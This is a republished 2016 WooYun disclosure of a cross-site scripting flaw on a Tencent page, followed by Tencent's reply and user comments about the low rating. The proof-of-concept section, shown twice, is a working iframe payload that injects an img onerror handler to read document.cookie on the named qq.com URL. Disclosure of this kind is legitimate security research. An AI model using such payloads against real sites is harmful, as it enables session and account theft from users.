腾讯又一XSS被广泛用于黑产

2017年5月1日03:32:04评论433 views字数 199阅读0分39秒阅读模式

摘要

2016-05-05：细节已通知厂商并且等待厂商处理中
2016-05-06：厂商已经确认，细节仅向厂商公开
2016-05-16：细节向核心白帽子及相关领域专家公开
2016-05-26：细节向普通白帽子公开
2016-06-05：细节向实习白帽子公开
2016-06-20：细节向公众公开

漏洞概要关注数(73) 关注此漏洞

缺陷编号： WooYun-2016-205124

漏洞标题：腾讯又一XSS被广泛用于黑产

漏洞作者： %2e

提交时间： 2016-05-05 12:43

公开时间： 2016-06-20 22:20

漏洞类型： XSS 跨站脚本攻击

危害等级：高

自评Rank： 20

漏洞状态：厂商已经确认

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： XSS

4人收藏

漏洞详情

披露状态：

简要描述：

这个问题有点严重....华强北那群搞iCloud账户密码，就是这么干的..
这就是为毛点链接密码就被改了的原因..

详细说明：

poc

code 区域

<iframe src="http://dzs.qq.com/act/a20141119fullpage/index.htm#'><img src=x.jpg onerror=alert(document.cookie)>" ></iframe>

漏洞证明：

poc

code 区域

<iframe src="http://dzs.qq.com/act/a20141119fullpage/index.htm#'><img src=x.jpg onerror=alert(document.cookie)>" ></iframe>

修复方案：

：）无

版权声明：转载请注明来源 %2e@乌云

漏洞回应

厂商回应：

危害等级：低

漏洞Rank：1

确认时间：2016-05-06 22:19

厂商回复：

非常感谢您的报告。该问题已经先通过其它渠道发现并已着手处理。如您有进一步发现，请及时与我们联系。如果您有任何的疑问，欢迎反馈，我们会有专人跟进处理。

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2016-05-05 13:09 | dige ( 路人 | Rank:5 漏洞数:3 | 路虽远，行则必达，事虽难做则必成)

0

66666

1# 回复此人
2016-05-05 13:18 | px1624 ( 普通白帽子 | Rank:1171 漏洞数:208 | px1624)

0

腾讯的xss总是被广泛用于黑产~

2# 回复此人
2016-05-05 13:57 | 大师兄 ( 实习白帽子 | Rank:31 漏洞数:8 | 每日必关注乌云)

0

洞主你是深圳的？

3# 回复此人
2016-05-06 22:56 | 蜀骷卿 ( 实习白帽子 | Rank:53 漏洞数:14 | 爱好互联网，为网络安全做出贡献)

2

腾讯的回复好像真的只有一种啊

4# 回复此人
2016-05-07 10:03 | sysALong ( 普通白帽子 | Rank:464 漏洞数:100 | 在我们黑龙江这噶哒，就没有什么事是【撸串...)

0

洞主要是不匿名，分分钟被人射死！

5# 回复此人
2016-05-07 10:10 | 爱偷懒的98 ( 普通白帽子 | Rank:136 漏洞数:48 | 从前车马邮件都很慢，一生只够爱一个人。)

0

这就蛋疼了。。洞主还不如拿去搞嘿

6# 回复此人
2016-05-07 10:24 | 木易 ( 普通白帽子 | Rank:347 漏洞数:70 | 不，，不要误会，我不是针对谁，我是说在座...)

0

又是问题已经先通过其它渠道发现，这个其他渠道真是叼的一笔！

7# 回复此人
2016-05-07 10:36 | 爱偷懒的98 ( 普通白帽子 | Rank:136 漏洞数:48 | 从前车马邮件都很慢，一生只够爱一个人。)

0

然而是首发他也这样说。。。蛋疼

8# 回复此人
2016-05-07 12:46 | 傻强_在路上 ( 路人 | Rank:30 漏洞数:2 | 安全路上小小小小白一枚)

0

腾讯每次都是这种咩？ 1 RANK. 非常感谢您的报告，此问题已经通过其它渠道得知，目前我们正在处理中，感谢大家对腾讯业务安全的关注。如果您有任何疑问，欢迎反馈，我们会有专人跟进处理

9# 回复此人
2016-05-07 13:02 | p1tt0 ( 路人 | Rank:2 漏洞数:1 | 我就是我，颜色不一样的烟火)

0

1rank，这是故意的？？

10# 回复此人
2016-05-07 17:06 | 兔八哥 ( 实习白帽子 | Rank:41 漏洞数:6 | 我心飞翔)

0

少一点套路，多一点真诚，TX的其他渠道要媲美TG的相关部门了

11# 回复此人
2016-06-21 02:58 | Fu地魔 ( 路人 | Rank:20 漏洞数:8 | 无声无息)

0

看腾讯是怎么给你1Rank的，后面排队。

12# 回复此人
2016-06-21 08:00 | SoulHunter ( 实习白帽子 | Rank:44 漏洞数:15 | 已经死了。)

0

看腾讯是怎么给你1Rank的，后面排队。

13# 回复此人
2016-06-21 09:40 | yzy9952 ( 实习白帽子 | Rank:64 漏洞数:10 | yzy9952)

0

还不胜搞黑产，1Rank

14# 回复此人
2016-06-21 09:50 | 大师兄 ( 实习白帽子 | Rank:31 漏洞数:8 | 每日必关注乌云)

0

弹一下就好了？内容太少，所以1rank.

15# 回复此人
2016-06-21 10:15 | 美食家L ( 实习白帽子 | Rank:65 漏洞数:10 | http://404.so 安静的坚持自己的原则)

0

为啥要说出来！

16# 回复此人
2016-06-21 10:41 | 潘多拉 ( 路人 | Rank:0 漏洞数:1 | 专注于岛国爱情片，打码片)

1

洞主一个字装逼犯傻

17# 回复此人

漏洞概要 关注数(73) 关注此漏洞